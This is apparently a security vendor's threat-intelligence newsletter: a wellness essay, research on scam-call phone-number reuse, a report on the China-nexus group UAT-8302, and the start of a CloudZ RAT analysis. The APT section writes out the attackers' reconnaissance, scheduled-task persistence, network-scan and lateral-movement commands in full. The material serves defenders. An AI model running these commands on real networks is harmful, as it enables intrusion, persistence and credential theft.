Welcome to this week’s edition of the Threat Source newsletter.Hey, you. Yeah, you! The person endlessly scrolling or typing away at their computer. Did you touch grass today? It's just an expression, but if nature’s your thing, that works just fine.What I do mean is that due to the nature of the field, cybersecurity is incredibly intangible. You can’t reach out and touch your logs, or the packets traversing your network, or the concept of DNS exfiltration... and if you tried, you’d just feel th
Welcome to this week’s edition of the Threat Source newsletter.
Hey, you. Yeah, you! The person endlessly scrolling or typing away at their computer. Did you touch grass today? It's just an expression, but if nature’s your thing, that works just fine.
What I do mean is that due to the nature of the field, cybersecurity is incredibly intangible. You can’t reach out and touch your logs, or the packets traversing your network, or the concept of DNS exfiltration... and if you tried, you’d just feel the smooth surface of your computer screen. (What a boring texture.) Spending all our time in the abstract can create some serious mental fatigue.
My point is that there’s something powerful to be said about engaging with the physical world. When we engage in a tactile hobby, we give our brains a hard reset. By moving from the abstract to the physical, our brains get the time and space to process the complex problems we’ve been staring at, often leading to the “aha!” moment that never comes when you're trying to force it.
The other week, I was working in the Talos office with the Creative team. It was a quiet afternoon, people’s energy sapped by stomachs full of Mediterranean food. That was swiftly interrupted (in the best way) when Joe Marshall came over into our work area with his miniature painting kit, broke it open, and started teaching us how to drybrush 3D-printed figurines. Everyone immediately came alive. While I didn’t partake (I know, “Do as I say, not as I do”), it reminded me of how revitalized I feel when I get outside for a walk during lunch or spend 10 minutes knitting in silence between meetings. There’s nothing to focus on but the feel of the yarn between your fingers, the clacking of the needles, and the repetitive motions that result in a physical object you can wear and fish for compliments about.
Speaking of, do you think the vest I knit is cool? All compliments can be sent to me on LinkedIn, and I refuse to accept any negative comments. (Critiques are fine.)
Ahem... anyway. Go on a walk without your earbuds, listen to the wind through the leaves, ask a stranger to pet their dog, watch a pigeon bop its head around, and reach out to touch a cool-looking rock or the lichen on a tree. I hear you saying, "That’s some tree-hugging bullshit,” and counter you with, “Just humor me, okay? What’s the worst that could happen?”
If you’re more of an inside person, the goal might be to find a physical anchor for your technical interest. Maybe it’s building a mechanical keyboard from scratch — feeling the weight of the switches and hearing the click of the keycaps. Maybe it’s a complicated LEGO set. Even something as simple as making espresso or organizing your bookshelf can provide that sensory feedback your brain is craving.
If you're not currently facing a life-altering deadline, take 10 minutes and try it now. The rest of the newsletter isn’t going anywhere, I promise.
When you pay attention to the noises you hear, the colors you see, and the textures under your fingertips, you might come back to your laptop refreshed, focused, and ready to solve the next problem.
The one big thing
Cisco Talos has recently expanded our threat intelligence capabilities to track phone numbers as critical indicators of compromise (IOCs) in scam emails. Our latest research reveals that attackers heavily favor API-driven VoIP numbers to execute high-volume, cost-effective Telephone-Oriented Attack Delivery (TOAD) campaigns. To evade detection, these threat actors rotate through sequential blocks of numbers, use strategic cool-down periods, and recycle the exact same digits across completely unrelated lures and impersonated brands.
Why do I care?
Tracking ephemeral sender email addresses is a losing game, but phone numbers are the true operational anchors for these organized scam call centers. Because attackers reuse these numbers across multiple document types and brand impersonations, defenders who cluster this telephony infrastructure can expose the broader network of malicious activity. Understanding these reuse patterns gives defenders a much-needed edge in mapping out and dismantling these operations before users are manipulated into handing over sensitive data.
So now what?
Security teams should shift their focus toward clustering scam lures based on shared phone numbers and prioritize real-time reputation monitoring to flag high-risk infrastructure. Deploying an AI-powered email security solution like Cisco Secure Email Threat Defense can also help evaluate different portions of incoming emails to catch these targeted threats. A full list of indicators of compromise (IOCs) associated with these campaigns can be found in the blog.
Top security headlines of the week
DigiCertrevokescertificatesaftersupportportalhack The attack, the company said in a detailed report, occurred on April 2, when a threat actor targeted DigiCert’s support team with a malicious payload delivered via a customer chat channel, disguised as a screenshot. (SecurityWeek)
Ubuntu services hit by outages after DDoS attack The DDoS-for-hire service in this case claims to power attacks in excess of 3.5 Tbps, which is about half of the bandwidth of a cyberattack that Cloudflare last year called the “largest DDoS attack ever recorded.” (TechCrunch)
Canvas maker Instructure reveals data breach Instructure said the actors accessed “certain identifying information of users” at affected institutions, including names, email addresses, student ID numbers, and user communications. (Tech Radar)
Exploitation of “Copy Fail” Linux vulnerability begins Threat actors are exploiting a recently disclosed Linux kernel vulnerability leading to root shell access, the US cybersecurity agency CISA warns. Dubbed Copy Fail, the security defect impacts all Linux distributions since 2017. (SecurityWeek)
Student hacked Taiwan high-speed rail to trigger emergency brakes According to local reports, the student halted four trains for 48 minutes by using software-defined radio (SDR) communications and handheld radios to transmit a high-priority “General Alarm” signal, triggering emergency braking procedures. (BleepingComputer)
Can’t get enough Talos?
Talesfrom the Frontlines In this briefing, we’ll share behind-the-scenes insights from the most critical and high-impact incidents we responded to in the last quarter. This isn't a report walkthrough; it's a look at what really happened, how we handled it, and what it means for your organization.
UAT-8302 and its box full of malware Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus APT group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.
CloudZ RAT potentially steals OTP messages using Pheno plugin Cisco Talos discovered an intrusion, active since at least January 2026, where an unknown attacker implanted a CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”
Cisco Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails. According to Talos’ observations, the ease of API-driven provisioning makes a few VoIP providers the preferred tool for attackers, allowing for high-volume, cost-effective scam operations that are difficult to trace. Attackers maintain operational continuity
Cisco Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails.
According to Talos’ observations, the ease of API-driven provisioning makes a few VoIP providers the preferred tool for attackers, allowing for high-volume, cost-effective scam operations that are difficult to trace.
Attackers maintain operational continuity by rotating through sequential blocks of phone numbers and utilizing strategic cool-down periods, with a median phone number lifespan of 14 days, to effectively evade reputation-based security filters.
Threat actors try to maximize their reach by recycling the same phone numbers across diverse, seemingly unrelated lures - including varied subject lines and different attachment formats like HEIC and PDF - to impersonate multiple brands simultaneously.
Security researchers can expose the hidden infrastructure of organized scam call centers by shifting focus from ephemeral email addresses to phone numbers, using clustering techniques to connect disparate campaigns and strengthen overall defensive postures.
Telephone-oriented attack delivery (TOAD) continues to be a prevalent tactic in modern email threats. By shifting the communication channel from email to a real-time conversation, attackers manipulate victims into disclosing sensitive information or installing malicious software.
Cisco Talos has expanded its threat intelligence capabilities to include phone numbers as a critical IOC. Our analysis covers a wide spectrum of line types, including wireless (cellular), landline, and Voice over Internet Protocol (VoIP). While scammers leverage all three, VoIP numbers are particularly prevalent due to their ease of acquisition and the difficulty of tracing them back to their origin. In fact, six of the ten largest campaigns we detected between February 26 and March 31, 2026 relied on VoIP infrastructure.
To better understand how these numbers are weaponized, this blog first explains the technical structure of VoIP numbers and the role of service providers in this ecosystem. We then broaden the scope to analyze reuse patterns, lifespan, and campaign characteristics across all line types. By sharing these insights, Talos aims to strengthen our collective defensive posture against these evolving threats.
The structure of VoIP phone numbers
Most VoIP numbers follow the E.164 international public telecommunication numbering plan. This format ensures that every number is globally unique and can be routed correctly across the Public Switched Telephone Network (PSTN).
An E.164 number is limited to 15 digits and consists of:
International Prefix (+): Indicates the number is in international format
Country Code (CC): 1 to 3 digits (e.g., 1 for the US/Canada, 44 for the UK)
Area Code/National Destination Code (NDC): Often referred to as the area code
Subscriber Number (SN): The specific number assigned to the user or device
The above components are shown in the example phone number below:
Figure 1. The structure of an example VoIP phone number.
The VoIP ecosystem
Voice over Internet Protocol (VoIP) has become the primary medium for scam campaigns due to its cost effectiveness, ease of deployment, and API-driven automation. Within this ecosystem, we identify two primary operational models: wholesalers and retailers. VoIP wholesalers (e.g., Virtue, Twilio, and Bandwidth) operate in a business-to-business (B2B) capacity, sitting between Tier 1 carriers (e.g., AT&T, Verizon) and smaller service providers, selling high volumes of numbers in bulk. Conversely, VoIP retailers (e.g., RingCentral) sell finished business calling and collaboration solutions directly to organizations and end users.
VoIP providers are further categorized into communications platform as a service (CPaaS) and unified communications as a service (UCaaS). CPaaS providers offer programmable APIs that allow developers to integrate voice and messaging directly into applications. Because these platforms are designed for automation and high-volume traffic, they are frequently exploited by threat actors for rapid, API-driven number provisioning. In contrast, UCaaS providers offer comprehensive, end-user-facing communication suites. UCaaS platforms are typically designed for legitimate enterprise collaboration, and that makes them less attractive for scam email campaigns. Talos has found Sinch (primarily a leader in CPaaS) as the most commonly abused VoIP provider, and Verizon and NUSO as the least abused providers in the studied time window.
Figure 2. The distribution of phone line types in scam emails.
While VoIP line types dominate the scam landscape (see Figure 2), Talos has observed that threat actors utilize wireless (cellular) and landline numbers as well. Cellular numbers are harder to provision at scale, as they typically require physical SIM cards and stricter customer verification, making them more expensive and less disposable than VoIP numbers. Nevertheless, they are still widely adopted by scammers. Figure 3 shows the distribution of wireless carriers that are used byscammers in the studied time window. Landline numbers, on the other hand, are used to project a sense of local presence or established business legitimacy. By using a landline with a specific local area code, scammers can effectively impersonate local businesses (e.g., banks, utility companies, or government offices).
Figure 3. The distribution of carrier names in wireless phone numbers found in scam emails.
Phone number reuse and lifespan in scam campaigns
In this section, we provide insights into the lifecycle of phone numbers used in scam emails, examining how often they are reused, their typical lifespan, and how they appear across seemingly unrelated lures. Our analysis focuses on scam campaigns impersonating popular brands, including PayPal, Geek Squad (Best Buy), McAfee, and Norton LifeLock.
Phone number reuse patterns
Talos identified 1,652 unique phone numbers across these campaigns during the studied time window (February 26 to March 31). Of these, 57 numbers (approximately 3.4%) were reused across multiple consecutive days. The longest period of reuse observed for a single phone number was four consecutive days.
As discussed in a previousblog post, phone numbers are reused for several strategic reasons. First, intelligence regarding phone numbers is often distributed more slowly than that of URLs or file hashes; many numbers remain under the radar of third-party reputation services for several days. Second, reuse offers logistical advantages for scam call centers, allowing them to maintain a consistent brand presence for multi-stage social engineering, callback scheduling, and persistent victim engagement. Finally, reuse minimizes operational costs, particularly for paid VoIP services. While we observed some phone numbers reused for up to four consecutive days, the most common reuse period was two consecutive days.
Lifespan analysis and cool-down periods
Scammers do not always reuse phone numbers on consecutive days. Often, they implement a cool-down period — pausing the use of a number for a few days to evade detection — before reintroducing it into a campaign.
Our investigation into the lifespan of these numbers revealed that 108 phone numbers (~6.5%) remained active for more than one day. As shown in Figure 4, most phone numbers have a lifespan of two to six days, though a handful remained active for nearly a month. During the study window, the median lifespan was approximately 14 days. Notably, infrastructure longevity often correlates with the impersonated brand; as illustrated in Figure 5, PayPal-themed scam campaigns utilized significantly more persistent phone numbers than those impersonating Norton LifeLock.
Figure 4. The distribution of phone number lifespans (in days) in scam emails impersonating the above four brands.Figure 5. The lifespan of phone numbers in scam emails for the top two impersonated brands.
Phone numbers across unrelated lures
A scam or phishing lure is typically a combination of a business context, a psychological trigger, a call-to-action, and an impersonated brand (see Table 1 for a few examples). These lures appear across various email layers, including subject lines, body content, and attachments.
Claimed business context
Psychological trigger
Call-to-action
Impersonated brand
Subscription renewal
Invoice or billing statement
Account security alert
Order confirmation/shipping issue
Technical support case
Refund or overpayment notice
Service cancelation confirmation
Financial transaction verification
Urgency
Fear/Loss aversion
Confusion
Relief opportunity
Curiosity
Call a phone number
Click a link
Reply with personal details
Download/open attachment
Provide payment/banking information
PayPal
Geek Squad (Best Buy)
McAfee
Norton LifeLock
Table 1. Examples of lures that most commonly appear in scam or phishing emails.
We observed phone numbers being recycled across diverse, seemingly unrelated lures:
Using the same phone number across multiple lures in the subject line: In one campaign, a single phone number appeared across multiple business contexts, such as "order confirmation" and "financial transaction verification." Figure 6 demonstrates how these subject lines differ, despite the emails containing the same phone number and impersonating the same brand.
Figure 6. Four scam emails with completely different subject lines that contain the same phone number.
Using the same phone number across multipledocument-basedlures: In a second campaign, a single phone number was embedded in PDF attachments used for both “subscription renewal” and “financial transaction verification.”Interestingly, this campaign utilized two different brands — PayPal and Norton LifeLock — to redirect recipients to the same call center, leveraging urgency as a psychological trigger.
Figure 7. Two scam emails with different body contents that contain the same phone number while impersonating different brands.
Using the same phone number across multiple attachment file formats: In a third campaign, a single phone number was embedded in two different attachment formats: HEIC and JPEG. The use of HEIC (High Efficiency Image Container) — a format often used for iPhone/iPad photos — demonstrates the attackers' efforts to bypass traditional file-based detection while maintaining high image quality. Talos has observed campaigns utilizing even more attachment types, confirming that threat actors frequently distribute a single phone number across multiple attack vectors to maximize their reach.
Figure 8. Two scam emails with different attachment file types that contain the same phone number while impersonating the same brand.
Phone block-level clustering
In the context of scam emails and related smishing or callback scams, attackers utilize specific VoIP grouping and clustering techniques to bypass security filters, appear legitimate, and maintain high-volume operations. One of the most common tactics is sequential number grouping. Scammers often obtain large ranges of sequential phone numbers by purchasing Direct Inward Dialing (DID) blocks. Consequently, if a specific number is flagged as spam and blocked by a carrier, the attackers simply rotate to the next number in the block.
The figure below shows how a block of numbers — differing only in the last four digits — is used in various scam emails impersonating PayPal between March 3 and March 6, 2026. It is also clear that certain numbers are used in larger campaigns than others; for instance, “+1 804[-]713[-]4598” was used in 117 scam emails in a single day.
Figure 9. Example of sequential phone numbers used in scam emails impersonating one specific brand.
In large-scale scam campaigns, phone numbers within a single sequential block are reused across multiple brand lures. The figure below shows how a range of numbers in a sequential block is deployed across three different brand lures. As with the previous case, some phone numbers are utilized in significantly larger campaign volumes than others.
Figure 10. Example of sequential phone numbers used in scam emails impersonating multiple brands.
Conclusion and protection
When tracking scam campaigns, it is essential to look beyond individual sender email addresses, which are often ephemeral. Instead, it is more strategic to focus on phone numbers, which serve as the true anchors of the operation. By clustering scam lures based on shared phone numbers, security researchers can effectively map connections between seemingly unrelated campaigns, ultimately exposing the infrastructure of organized criminal call centers.
Service providers and security teams should prioritize the implementation of real-time reputation monitoring for different communication channels to proactively mitigate these threats. For example, establishing centralized databases that track and flag high-risk phone numbers across multiple platforms allows for rapid cross-campaign correlation. Collaboration between telecommunications and VoIP providers is also vital, as sharing threat intelligence regarding malicious telephony infrastructure enables an industry-wide defense against the persistent threat of social engineering and fraud.
Cisco Secure Email Threat Defense
Protecting against these sophisticated and devious threats requires a comprehensive email security solution that harnesses AI-powered detections. Cisco Secure Email Threat Defense utilizes unique deep and machine learning models, including Natural Language Processing, in its advanced threat detection systems that leverage multiple engines. These simultaneously evaluate different portions of an incoming email to uncover known, emerging, and targeted threats.
Secure Email Threat Defense identifies malicious techniques used in attacks targeting your organization, derives unparalleled context for specific business risks, provides searchable threat telemetry, and categorizes threats to understand which parts of your organization are most vulnerable to attack. You can sign up for a free trial of Email Threat Defense today.
Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.After successful compromises, UAT-8302 deploys multiple custom-made malware families that have previously been used by other known China-nexus threat actors.Talos discovered a .NET-based backdoor we track as “NetDraft” that is a C#-based variant of the FinalDraft/Squid
Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.
After successful compromises, UAT-8302 deploys multiple custom-made malware families that have previously been used by other known China-nexus threat actors.
Talos discovered a .NET-based backdoor we track as “NetDraft” that is a C#-based variant of the FinalDraft/SquidDoor malware family developed and operated by Jewelbug/REF7707/CL-STA-0049/LongNosedGoblin, a cluster of China-nexus APT actors.
Furthermore, UAT-8302 also uses an updated version of the CloudSorcerer backdoor, a malware family used in attacks against Russian government entities in 2024.
UAT-8302 also used VSHELL and its SNOWLIGHT stager in their operations, along with a new Rust-based stager that we track as SNOWRUST.
Talos assesses with high confidence that UAT-8302 is a China-nexus advanced persistent threat (APT) group tasked primarily with obtaining and maintaining long-term access to government and related entities around the world.
Post-compromise activity consisted of information collection, credential extraction, and proliferation using open-source tooling such as Impacket, proxying tools, and custom-built malware.
Malware deployed by UAT-8302 connects it to several previously publicly disclosed threat clusters, indicating a close operating relationship between them at the very least. Overall, the various malicious artifacts deployed by UAT-8302 indicate that the group has access to tools used by other sophisticated APT actors, all of which have been assessed as China-nexus or Chinese-speaking by various third-party industry reports.
For instance, NetDraft, a .NET-based malware family deployed by UAT-8302 in South America, was also disclosed by ESET as NosyDoor, attributed to a China-nexus APT they track as LongNosedGoblin. ESET assesses that LongNosedGoblin used NosyDoor/NetDraft and other custom-made malware to target government organizations in Southeast Asia and Japan. Furthermore, as per Solar’s reporting, NetDraft was also deployed against Russian IT organizations in 2024 by Erudite Mogwai (LuckyStrike Agent).
NetDraft is likely a .NET-ported variant of the FinalDraft/SquidDoor malware family developed and operated exclusively by Jewelbug/REF7707/CL-STA-0049 — also another cluster of China-nexus APT actors.
Another malware family deployed by UAT-8302 is CloudSorcerer (version 3). Kaspersky disclosed that CloudSorcerer was used in attacks directed against Russian government entities in 2024.
Furthermore, two other malware families, SNAPPYBEE/DeedRAT and ZingDoor, were deployed by UAT-8302 in conjunction with each other, a tactic also highlighted by Trend Micro in 2024.
Talos’ analysis also connects more custom-made tooling that UAT-8302 used to other China-nexus or Chinese-speaking APTs:
Draculoader: A generic shellcode loader deployed by UAT-8302, also used by the Earth Estries and Earth Naga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere.
SNOWLIGHT: A generic stager for the VSHELL malware family, used by UAT-8302. Also used by UAT-6382, who exploited a Cityworks zero-day (CVE-2025-0994) to deploy VSHELL. SNOWLIGHT has also been seen in intrusions attributed to other China-nexus APT clusters, such as UNC5174 and UNC6586.
The various connections between UAT-8302 and other China-nexus or Chinese-speaking threat actors can be visualized as:
Figure 1. UAT-8302's interconnections.
Initial compromise and reconnaissance
UAT-8302's tooling overlaps with various APT groups that have been known to exploit both zero-day and n-day exploits to obtain initial access. We assess that UAT-8302 follows the same paradigm of obtaining initial access to its victims.
Once initial access is obtained, UAT-8302 conducts preliminary reconnaissance using red-teaming tools such as Impacket:
Other reconnaissance commands may be:
ipconfig /all
certutil -user -store My
certutil -user -store CA
certutil -user -store Root
whoami
nslookup www[.]google[.]com
net use
cmd.exe /c net view /domain
cmd.exe /c systeminfo
cmd.exe /c net time /domain
cmd.exe /c nslookup -type=SRV _ldap._tcp
net group <name> /domain
One of UAT-8302's primary goals is to proliferate within the compromised network, and therefore, the actor conducts extensive reconnaissance on every endpoint that they can access. This extended recon is scripted usually using a custom-made PowerShell script such as “whatpc.ps1”:
The script may be persisted to collect system information via a scheduled task:
cmd.exe /c schtasks /create /tn 'ReconLiteDebug' /tr 'powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File c:\windows\temp\whatpc.ps1' /sc ONCE /st 08:25 /ru SYSTEM /f
cmd.exe /c schtasks /create /tn 'RunWhatPC' /tr 'c:\windows\temp\run.bat' /sc ONCE /st 23:28 /ru SYSTEM /f
This script executes the following commands on the systems to identify them:
whoami
whoami.exe /groups
whoami.exe /priv
net.exe user
net.exe localgroup
net.exe localgroup administrators
ipconfig.exe /all
ARP.EXE -a
ROUTE.EXE print
NETSTAT.EXE -ano
cmd.exe /c net share
cmd.exe /c wmic startup get caption,command 2>&1
nltest.exe /dclist:<domain>
net.exe user /domain
net.exe group /domain
net.exe group Domain Admins /domain
nltest.exe /domain_trusts
UAT-8302 also performs ping sweeps of the network to discover more endpoints to proliferate into:
C:/Windows/Temp/ping_scan.bat
C:/Windows/Temp/run_scan.bat
C:/Windows/Temp/nbtscan.exe
cmd.exe /Q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= && echo 192.168.1.%i is alive) > C:\Windows\Temp\alive_hosts.txt
UAT-8302 also discovers SMB shares in the network to find reachable remote shares:
cmd.exe /Q /c (for /l %i in (1,1,254) do @net use \\192.168.1.%i\IPC$ >nul 2>&1 && echo 192.168.1.%i - Port 445 is open || echo 192.168.1.%i - Port 445 is closed) > C:\Windows\Temp\portscan.txt
Scanning tools
UAT-8302 may also download and run “gogo,” a GoLang based, open-sourced automated network scanning engine written in Simplified Chinese:
UAT-8302 collects a variety of information about the environment that they are operating within including Active Directory (AD) information and credentials using open-sourced tooling such as:
adconnectdump.py
A Python-based tool for Azure AD Connect/Entra ID connect credential extraction:
python.exe adconnectdump.py
Manual extraction
UAT-8302 may also directly query the AD user and computer objects to obtain information from them via PowerShell:
Specific AD users of interest may also be queried using system tools such as dsmod and dsquery.
Log collection
UAT-8302 also collects event log information and the logs themselves on multiple endpoints. Logs are an excellent source of obtaining information and understanding security configurations and policies applied within a target’s environment:
UAT-8302 also uses a tool written in Simplified Chinese called “SharpGetUserLoginIPRP” — derived from another Chinese-language repository — which is used to extract login information from a domain controller:
C:\ProgramData\S.exe user:pass@IP -day
Proliferation through the network
UAT-8302 proliferates across various endpoints by using a combination of either Impacket- or WMI-based remote process creation:
cmd.exe /C wmic /node:IP process call create cmd.exe /c c:\programdata\e1.bat
cmd.exe /C schtasks /S IP /U username /P passwd /create /tn 'Runbat' /tr 'c:\windows\temp\run.bat' /sc ONCE /st 5:12 /ru SYSTEM /f
These BAT files are meant to execute the accompanying malware on the target systems.
Furthermore, UAT-8302 may also extract login credentials from MobaxXterm, a multi-functional and tabbed SSH client, using tools such as MobaXtermDecryptor to pivot to other endpoints.
Custom-made malware deployment
UAT-8302 deploys a variety of malware families in their intrusions including NetDraft, CloudSorcerer version 3, and VSHELL.
NetDraft
NetDraft, also known as NosyDoor, is a .NET variant of the FINALDRAFT malware. FINALDRAFT or Squidoor is a malware family developed and operated exclusively by Jewelbug/REF7707/CL-STA-0049, a cluster of China-nexus APT actors. FINALDRAFT uses legitimate services such as MS Graph to act as command-and-control servers (C2s) to execute commands and payloads on the compromised system. Similarly, NetDraft relies on the MS Graph API to communicate with its OneDrive based C2. NetDraft is deployed using the following mechanism:
A benign executable is used to side load a malicious dynamic-link library (DLL) based loader.
The loader DLL decodes NetDraft from an accompanying data file and invokes it in the context of the existing process.
NetDraft also contains an embedded, .NET-based helper library. The library is compressed and embedded using the Fody/Costura framework. During runtime, the library is decompressed and instrumented to carry out operations on the endpoint on behalf of NetDraft. We track this library as “FringePorch.”
Figure 2. NetDraft and FringePorch infection chain.
NetDraft and FringePorch support the following functionalities:
Execute arbitrary commands on the endpoint
Execute a .NET based assembly sent by the C2 within NetDraft’s process context
Exit and stop execution
Upload files to C2
Download files from specified remote locations to local disks
File management: Change current working directory, rename files, enumerate files, and set write times
Sleep
Execute a .NET plugin: This functionality is similar to its ability to run arbitrary .NET based assemblies. Here, the implant runs a provided plugin’s “Plugin.Run” function.
Since NetDraft is missing the capability to persist across reboots and relogins, one of the first commands the C2 issues to it is the creation of a malicious scheduled task:
Another malware UAT-8302 deploys is the latest version of the CloudSorcerer backdoor (version 3). The malware consists of the side-loading triad of files: a benign executable, a malicious DLL-based loader, and the actual implant in a data file:
The executables will sideload a DLL named “mspdb60[.]dll”, which will load and decrypt the “.ini” file specified in the command line — such as “test.ini” or “vm.ini”. The decrypted shellcode is then injected into a combination of specified benign processes.
CloudSorcerer v3 – The decrypted shellcode
The decrypted INI file is a newer version of CloudSorcerer (v3) disclosed by Kaspersky in 2024. Depending on process name (where it may have been initiated or injected), CloudSorcerer v3 will perform one of the following actions:
If the process is named “dpapimig.exe”, then it will gather system information, inject itself into explorer.exe, and receive command codes from the C2 via a named pipe, gather disk information, enumerate files, execute arbitrary commands, perform file operations (delete, rename, read, write, etc.) and execute shellcode received via the named pipe.
If the process is named “spoolsv.exe”, then it will contact GitHub to obtain C2 information and receive commands from the C2.
If the process is named “mspaint.exe”, “browser”, or anything else, it will proceed to inject itself into dpapimg.exe, spoolsv.exe, etc. to kick off its malicious operations.
The system information CloudSorcerer v3 collects includes computer name, username and local system time.
Obtaining C2 information
Like CloudSorcerer v2, version 3 contacts a legitimate service to obtain the C2 information. The malware will either contact a specific GitHub repository to read a data blob, or read a GameSpot profile the threat actors set up.
The data blob is decoded to obtain the C2 information, which can exist in the one of the following formats depending on the variant of the CloudSorcerer backdoor:
A C2 URL for a domain or IP, controlled by UAT-8302, that the malware uses to begin communication with the C2 to carry out malicious operations
An access token to a legitimate service (such as OneDrive or Dropbox) that UAT-8302 uses to act as its C2 infrastructure to obtain next-stage payloads and commands
VSHELL, SNOWLIGHT and SNOWRUST
In other instances, UAT-8302 deploys the VSHELL malware via a slightly different triad of artifacts for side-loading malware. The benign executable side-loads a malicious DLL named “wininet[.]dll” that reads a BIN file and injects it into “explorer[.]exe”.
The payload is position-independent shellcode that is injected into explorer[.]exe. The payload is a stager for the VSHELL malware that downloads and single-byte XORs the obtained payload with the key 0x99. The decoded payload is a garbled version of VSHELL.
It is worth noting that Talos observed the same single byte key and stager being used by UAT-6382 to deliver VSHELL malware in early 2025. Further investigation revealed that this stager is in fact SNOWLIGHT, a lightweight downloader that can download and deploy a next stage payload. UNC5174 has been observed using SNOWLIGHT to download Sliver and VSHELL. UNC5174 is a suspected China-nexus threat actor that typically exploits zero-day and n-day vulnerabilities to gain access to critical infrastructure organizations in the Americas.
Talos discovered that UAT-8302 also used a Rust based variant of SNOWLIGHT that we track as “SNOWRUST.” SNOWRUST is based on the LexiCrypt Rust-based shellcode obfuscator. SNOWRUST simply decodes the embedded SNOWLIGHT shellcode and executes it to download the XOR encoded final payload, VSHELL, received from the C2.
In one intrusion, UAT-8302 used VSHELL to deploy a native driver from the Hades HIDS/HIPS software — an open-source Windows host monitoring kernel framework written in Simplified Chinese. The driver was specifically the System Monitoring filter driver that lets Hades register callbacks for process, thread, registry, and file events. This allows the driver to monitor the system and potentially allow, block, or hide events and artifacts.
In parallel, UAT-8302 also deployed Draculoader, a generic shellcode loader, also used by the Earth Estries and Earth Naga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere:
C:\Documents and Settings\All Users\Microsoft\Crypto\RSA\d3d8.dll
Setting up additional means of backdoor access
Once UAT-8302 deploys their custom-made malware, they begin establishing other means of backdoor access. One of the techniques used is setting up proxy servers on infected systems to tunnel traffic outside the enterprise to the infected hosts using tools such as Stowaway (another tool written in Simplified Chinese):
Cisco Talos discovered an intrusion, active since at least January 2026, where an unknown attacker implanted a CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”According to the functionalities of the CloudZ RAT and Pheno plugin, this was with the intention of stealing victims’ credentials and potentially one-time passwords (OTPs). CloudZ utilizes the custom Pheno plugin to hijack the established PC-to-phone bridge by abusing the Microsoft Phone Link application
Cisco Talos discovered an intrusion, active since at least January 2026, where an unknown attacker implanted a CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”
According to the functionalities of the CloudZ RAT and Pheno plugin, this was with the intention of stealing victims’ credentials and potentially one-time passwords (OTPs).
CloudZ utilizes the custom Pheno plugin to hijack the established PC-to-phone bridge by abusing the Microsoft Phone Link application, allowing the plugin to continuously scan for active Phone Link processes and potentially intercept sensitive mobile data like SMS and OTPs without deploying malware on the phone.
CloudZ evades detection by executing critical malicious functions dynamically in system memory and performing checks to avoid debuggers and sandbox environments.
Attacker abuses the Windows Phone Link application
Windows Phone Link (formerly "Your Phone") is a synchronization tool developed by Microsoft and built directly into Windows 10 and 11 that bridges a PC and a smartphone (Android or iPhone). By establishing a secure connection via Wi-Fi and Bluetooth, the application mirrors essential phone activities (such as application notifications and SMS messages) onto the computer screen, reducing the user’s need to physically interact with the mobile device while working on the computer. The Phone Link application writes synchronized phone data such as SMS messages, call logs, and the application notification history to the Windows PC in the application’s SQLite database file.
Talos observed that during an intrusion, an attacker attempted to abuse the Windows Phone Link application using the CloudZ RAT and its Pheno plugin. The Pheno plugin is designed to monitor an active PC-to-phone bridge established by the Phone Link application on the victim machine. With a confirmed Phone Link activity on the victim's machine, the attacker using the CloudZ RAT can potentially intercept the Phone Link application’s SQLite database file (e.g., “PhoneExperiences-*.db”) on the victim machine, potentially compromising SMS-based OTP messages and other authenticator application notification messages.
Intrusion summary of CloudZ infection
Talos discovered from telemetry data that the intrusion had begun with an unknown initial access vector to the victim's environment, which led to the execution of a fake ScreenConnect application update executable. This malicious executable drop and executes an intermediate .NET loader executable, which subsequently deploys the modular CloudZ on the victim’s machine. Upon execution, the RAT decrypts its configuration data, establishes an encrypted socket connection to the command-and-control (C2) server, and enters its command dispatcher mode.
CloudZ facilitates the C2 commands to exfiltrate credentials from the victim machine browser data, and it downloads and implants a plugin. The plugin performs reconnaissance of the Microsoft Phone Link application on the victim machine and writes the reconnaissance data to an output file in a staging folder. CloudZ reads back the Phone Link application data from the staging folder and sends it to the C2 server.
Rust-compiled executable used as a dropper
Talos discovered a Rust-compiled 64-bit executable, disguised with file names such as “systemupdates.exe” or “Windows-interactive-update.exe”, functioning as a loader. The malicious loader was compiled on Jan. 1, 2026, and has the developer string of rustextractor.pdb.
When the loader is run on the victim machine, it decrypts and drops an embedded .NET loader binary disguised as a text file with the file names “update.txt” or “msupdate.txt” in the folder “C:\ProgramData\Microsoft\windosDoc\”.
Figure 1. Excerpt of rusty dropper code.
In another instance, Talos observed that the .NET loader was implanted in the victim machine by downloading it from an attacker-controlled staging server using the command shown below:
The dropper executes an embedded PowerShell script to establish persistence on the victim machine through a Windows task which executes the dropped malicious .NET loader. The PowerShell script achieves it by initially performing a runtime check to determine whether the dropped .NET loader is already active on the system. It queries all running processes using the Get-CimInstance Win32_Process command and filters for any instance of regasm.exe with the command line parameters that include the string update.txt. If such an instance is found, the script silently exits without taking any action.
